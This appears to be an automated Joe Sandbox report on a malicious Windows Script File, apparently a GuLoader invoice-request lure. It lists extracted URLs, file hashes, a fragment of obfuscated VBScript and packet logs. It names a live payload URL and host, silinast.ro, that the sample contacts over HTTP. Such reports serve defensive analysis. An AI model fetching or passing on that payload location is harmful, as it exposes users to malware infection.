00000005.00000002.4613344132.0000015D81486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D80DE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D8195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81C0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D819FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D80D62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81A97000.00000004.00000800.00020000.00000000.sdmptrue
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://silinast.ro/Juglandin.xtpPpowershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmptrue
              		unknown
              https://contoso.com/powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.4640956886.0000015D901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 00000005.00000002.4613344132.0000015D80001000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.4613344132.0000015D80001000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmpfalseunknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              188.241.183.45
              		silinast.roRomania
              		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1528870
              Start date and time:2024-10-08 11:00:54 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 34s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:24
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Wniosek o numer faktury.wsf
              Detection:MAL
              Classification:mal96.troj.expl.evad.winWSF@9/3@2/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 83%
              • Number of executed functions: 6
              • Number of non-executed functions: 2
              Cookbook Comments:
              • Found application associated with file extension: .wsf
              • Override analysis time to 240s for powershell

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
              • Excluded IPs from analysis (whitelisted): 20.223.36.55, 20.223.35.26, 20.103.156.88, 20.31.169.57
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, iris-de-prod-azsc-v2-weu.westeurope.cloudapp.azure.com, ocsp.digicert.com, iris-de-prod-azsc-v2-weu-b.westeurope.cloudapp.azure.com, arc.trafficmanager.net, www.msftconnecttest.com, iris-de-prod-azsc-v2-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
              • Execution Graph export aborted for target powershell.exe, PID 1336 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              05:01:49API Interceptor11575697x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.241.183.45Prosba o oferte.wsfGet hashmaliciousGuLoaderBrowse
              • silinast.ro/Kommunikuternes.inf
              g 288322.vbsGet hashmaliciousGuLoaderBrowse
              • silinast.ro/Loveman232.msi

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              silinast.roProsba o oferte.wsfGet hashmaliciousGuLoaderBrowse
              • 188.241.183.45
              g 288322.vbsGet hashmaliciousGuLoaderBrowse
              • 188.241.183.45
              Cerere oferta S.C. SHIPYARD ATG GIURGIU S.R.L..vbsGet hashmaliciousGuLoaderBrowse
              • 188.241.183.45

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              GTSCEGTSCentralEuropeAntelGermanyCZProsba o oferte.wsfGet hashmaliciousGuLoaderBrowse
              • 188.241.183.45
              ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 185.146.87.128
              na.elfGet hashmaliciousUnknownBrowse
              • 94.42.225.21
              https://alquimista.hosted.phplist.com/lists/lt.php?tid=cE0FU1AHDgIFBx4AXQpVFAZXX18ZAwJTUx9QXA8AVFIMCQAEUVZKAFQHUVFfBFYUCloJBRlWDQ1SH15cAl1MUAFUAwIDUgNQUFlSHQxTUg1XUF9VGVIHVgUfUlgOUUxZXAZSGFMFDwxZBFdUWAEDAAGet hashmaliciousUnknownBrowse
              • 188.241.222.249
              ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 185.146.87.128
              g 288322.vbsGet hashmaliciousGuLoaderBrowse
              • 188.241.183.45
              na.elfGet hashmaliciousMiraiBrowse
              • 94.42.225.83
              na.elfGet hashmaliciousMiraiBrowse
              • 62.168.37.193
              na.elfGet hashmaliciousMiraiBrowse
              • 94.42.225.84
              na.elfGet hashmaliciousMiraiBrowse
              • 94.42.225.74

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):11608
              Entropy (8bit):4.890472898059848
              Encrypted:false
              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_did32yk0.pdw.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbyx2vmw.35g.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              Static File Info

              General

              File type:XML 1.0 document, ASCII text, with CRLF line terminators
              Entropy (8bit):5.21854109830718
              TrID:
              • Visual Basic Script (13500/0) 72.95%
              • Generic XML (ASCII) (5005/1) 27.05%
              File name:Wniosek o numer faktury.wsf
              File size:15'275 bytes
              MD5:b3a1adc2eab232bddfe5149b896af1c8
              SHA1:be84a3bb6abe9b87cd90af27ca5574dae9607d48
              SHA256:55d2f245a0b7975884b7e5bbf284bcb72cc1514a726eb6988a1ca1e1e429cfb4
              SHA512:0e89f571ad6380cb2be315474da159b0bd7c76fe4a170ef6a0fdaf67d3cefcd156500fb87df21adfb4bd0e28d5591a7faf50ea766d3329560e8783be4cf88f4d
              SSDEEP:384:vvjOLjVGaVToUC5DX/FTZjkp6d+Ume68lh6x6orij59EUqAoWD7yQZ1Mm3IZLxVi:njOLjVGaVToUC5r/FTZwp6d+Ume68lh7
              TLSH:82627F9485560F8D2E43237E2C126536CDF86A7E653F0C5C7A781F6C201AC9DAEB69CC
              File Content Preview:<?xml version="1.0" ?>..<job id="Objektiverendes">..<script ..language="VBScript">..' <![CDATA[..Private Const Helnodes = -21686..Private Const Lnnedgang = 1562..Private Const dekuprsave = 18205..Private Const Chondralgia = &HB29E..Private Const Gloomi

              File Icon

              Icon Hash:68d69b8f86ab9a86

              Static OLE Info

              General

              Document Type:Text
              Number of OLE Files:1

              OLE File "Wniosek o numer faktury.wsf"

              Indicators
              Has Summary Info:
              Application Name:
              Encrypted Document:False
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:False
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:True

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 8, 2024 11:01:51.002646923 CEST4976480192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.010387897 CEST8049764188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.010473013 CEST4976480192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.010797977 CEST4976480192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.017071962 CEST8049764188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.017087936 CEST8049764188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.017141104 CEST4976480192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.023622036 CEST8049764188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.027549028 CEST4976580192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.032766104 CEST8049765188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.032905102 CEST4976580192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.032905102 CEST4976580192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.040224075 CEST8049765188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.040237904 CEST8049765188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.040287018 CEST4976580192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.040319920 CEST4976580192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:51.045425892 CEST8049765188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:51.045438051 CEST8049765188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:55.381283998 CEST4980080192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:55.386107922 CEST8049800188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:55.386218071 CEST4980080192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:55.386255980 CEST4980080192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:55.391288042 CEST8049800188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:55.391623974 CEST8049800188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:55.394777060 CEST4980180192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:55.399748087 CEST8049801188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:55.399944067 CEST4980180192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:55.399945021 CEST4980180192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:55.404967070 CEST8049801188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:55.405514956 CEST8049801188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:59.423763037 CEST4982780192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:59.428714037 CEST8049827188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:59.429476023 CEST4982780192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:59.429553986 CEST4982780192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:59.434372902 CEST8049827188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:59.439090967 CEST8049827188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:59.439807892 CEST4982880192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:59.444662094 CEST8049828188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:59.444941998 CEST4982880192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:59.445091009 CEST4982880192.168.2.6188.241.183.45
              Oct 8, 2024 11:01:59.455378056 CEST8049828188.241.183.45192.168.2.6
              Oct 8, 2024 11:01:59.459125996 CEST8049828188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:03.510548115 CEST4984080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:03.515369892 CEST8049840188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:03.515460014 CEST4984080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:03.515549898 CEST4984080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:03.520430088 CEST8049840188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:03.520842075 CEST8049840188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:03.521414042 CEST4984180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:03.526257992 CEST8049841188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:03.526333094 CEST4984180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:03.526402950 CEST4984180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:03.531275988 CEST8049841188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:03.531438112 CEST8049841188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:07.526309013 CEST6220480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.531167030 CEST8062204188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:07.533785105 CEST6220480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.533785105 CEST6220480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.538710117 CEST8062204188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:07.539112091 CEST8062204188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:07.540004015 CEST6220580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.544862032 CEST8062205188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:07.544936895 CEST6220580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.545013905 CEST6220580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:07.550333023 CEST8062205188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:07.550771952 CEST8062205188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.596337080 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.601259947 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.601347923 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.604522943 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.606467009 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.606528044 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.608222961 CEST6220680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.609339952 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.611330986 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.611423016 CEST6220780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.612965107 CEST8062206188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.616313934 CEST8062207188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.616449118 CEST6220780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.616449118 CEST6220780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:11.621279955 CEST8062207188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:11.621573925 CEST8062207188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.761619091 CEST6220880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.766746998 CEST8062208188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.766834021 CEST6220880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.766910076 CEST6220880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.771770000 CEST8062208188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.772231102 CEST8062208188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.772903919 CEST6220980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.777811050 CEST8062209188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.781749010 CEST6220980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.781862974 CEST6220980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:15.786715031 CEST8062209188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:15.787034035 CEST8062209188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:19.811691999 CEST6221080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.132648945 CEST8062210188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.132886887 CEST6221080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.132886887 CEST6221080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.137829065 CEST8062210188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.138044119 CEST8062210188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.139060974 CEST6221180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.144026041 CEST8062211188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.144129992 CEST6221180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.144181013 CEST6221180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:20.149041891 CEST8062211188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:20.149252892 CEST8062211188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.150852919 CEST6221280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.155932903 CEST8062212188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.156007051 CEST6221280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.156074047 CEST6221280192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.160938978 CEST8062212188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.161248922 CEST8062212188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.161829948 CEST6221380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.166747093 CEST8062213188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.166810989 CEST6221380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.166860104 CEST6221380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:24.171673059 CEST8062213188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:24.171969891 CEST8062213188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.199570894 CEST6221480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.204550028 CEST8062214188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.204714060 CEST6221480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.204714060 CEST6221480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.209677935 CEST8062214188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.210231066 CEST8062214188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.211112976 CEST6221580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.216001987 CEST8062215188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.216089010 CEST6221580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.216144085 CEST6221580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:28.221443892 CEST8062215188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:28.221874952 CEST8062215188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.229635000 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.234421015 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.238723040 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.239213943 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.243912935 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.244096041 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.244235039 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.244313955 CEST6223980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.244611025 CEST6224080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.249192953 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.249224901 CEST8062239188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.249404907 CEST8062240188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.249557018 CEST6224080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.249557018 CEST6224080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:32.254410028 CEST8062240188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:32.254642010 CEST8062240188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.323085070 CEST6224380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.327923059 CEST8062243188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.328002930 CEST6224380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.328084946 CEST6224380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.332808971 CEST8062243188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.332948923 CEST8062243188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.333570004 CEST6224480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.338406086 CEST8062244188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.338474035 CEST6224480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.338532925 CEST6224480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:36.343275070 CEST8062244188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:36.343614101 CEST8062244188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.338550091 CEST6224580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.343415976 CEST8062245188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.343501091 CEST6224580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.343605042 CEST6224580192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.348352909 CEST8062245188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.348598003 CEST8062245188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.349097013 CEST6224680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.353929043 CEST8062246188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.354007006 CEST6224680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.354054928 CEST6224680192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:40.358989000 CEST8062246188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:40.359141111 CEST8062246188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.411983013 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.416841984 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.416920900 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.418354034 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.422311068 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.423110962 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.423185110 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.427947998 CEST6224780192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.428235054 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.428394079 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.433306932 CEST8062247188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.433445930 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.433530092 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.438704967 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.438810110 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.446125031 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.446170092 CEST6224880192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:44.451024055 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:44.451037884 CEST8062248188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.526375055 CEST6224980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.951278925 CEST8062249188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.951683044 CEST6224980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.951987982 CEST6224980192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.956856966 CEST8062249188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.957151890 CEST8062249188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.958527088 CEST6225080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.963365078 CEST8062250188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.963906050 CEST6225080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.964099884 CEST6225080192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:48.968873024 CEST8062250188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:48.968987942 CEST8062250188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:52.979830027 CEST6225180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.156387091 CEST8062251188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.156481981 CEST6225180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.156673908 CEST6225180192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:53.161386013 CEST8062251188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:53.161557913 CEST8062251188.241.183.45192.168.2.6
